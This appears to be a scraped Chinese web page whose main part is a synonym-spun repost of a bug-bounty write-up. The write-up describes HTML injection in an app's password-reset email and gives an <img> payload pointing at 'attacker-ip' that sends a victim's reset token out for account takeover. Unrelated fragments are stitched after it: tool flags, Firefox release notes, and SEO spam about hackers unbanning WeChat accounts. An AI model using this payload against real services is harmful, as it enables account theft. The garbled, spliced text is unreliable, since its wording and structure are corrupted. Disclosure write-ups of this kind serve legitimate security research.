tryint num=0;);">在这篇文章中,我将叙述我在某个 *** 运用中所找到的逻辑缝隙,它存在于“找回暗码”这个功用中,能够让我接收恣意用户的帐号。
尽管最终进行进犯的 *** 是经过垂钓手法,但这个缝隙仍然有满足的要挟。
以下我将方针称为“app”。
当我在测验这个运用的“忘掉暗码”功用时,运用burpsuite抓到了这样一个特别的HTTP数据包:在这个恳求的多个参数中,你应该会立马注意到一个特别的参数emailBody,形似其间掺杂了许多html代码,这或许涉及到找回暗码的某个web模板。
让咱们先测验一下,看是否能够往其间注入html代码。
我先简略的刺进了一个<a>标签,回应如下(即重置暗码的邮件):很好,咱们在重置暗码的链接前刺进了一个click,看样子这是一个规范的HTML注入,后端服务器并没有对用户的数据进行安全过滤就直接运用。
那么,它在实践情况下能到达什么进犯作用呢?我很快想到或许能够试试对其他用户进行垂钓进犯,究竟这个邮件的发送者但是运用官方。
完成这个垂钓进犯,只需刺进一个简略的url即可(刺进方位在[RESET-LINK]之前):<img src="http://attacker-ip/?id=一旦受害者翻开这封“找回暗码”的电子邮件,<img>标签就会向我的服务器宣布恳求,而重置暗码令牌也会被带到我的服务器上,详细如下图所示:进犯者能够轻松运用得到的令牌重置暗码,接收恣意帐户。
时间线:2019年1月8日 - 陈述缝隙2019年1月10日 - 查验中2019年1月10日 - 付出赏金本文由白帽汇收拾并翻译,不代表达帽汇任何观念和态度来历:https://nosec.org/home/detail/2503.html原文:https://medium.com/@mrnikhilsri/unauthenticated-account-takeover-through-http-leak-33386bb0ba0b白帽汇从事信息安全,专心于安全大数据、企业要挟情报。
公司产品:FOFA- *** 空间安全搜索引擎、FOEYE- *** 空间检索系统、NOSEC-安全消息渠道。
为您供给: *** 空间测绘、企业财物搜集、企业要挟情报、应急呼应服务。
-d <duration>测验运转的持续时间,例如,10s,4m,5h等.0 - 永久,默许值:10scd ethr 来自客户端的流量由负载均衡器分配给这些实例 -g, --good scan good headers only
NewWebVR has been enabled for Mac OS X usersAdded Nepali (ne-NP) localeAdded support for form autofill for credit cardChangedDowngrading profile to previous versions is not supported. In case of downgrade, it is suggested to use a new profileUnresolvedOn Windows and Linux, Firefox crashes occasionally on Intel Broadwell-U processors with old microcode. Windows users should ensure Windows Update is set to install updates. Linux users should ensure that the distribution package for Intel microcode is installed.下载地址:https://ftp.mozilla.org/pub/firefox/releases/58.0b13/ 拜访:黑客报仇,黑客能解封微信吗,上网站会不会给黑客
>sslscanC:UsersDemonDesktop「黑客报仇,黑客能解封微信吗,上网站会不会给黑客」黑客报仇,黑客能解封微信吗
2019国家 *** 安全宣传周系列动漫②——邮件安全篇
电子邮件,人们简直天天发、天天收。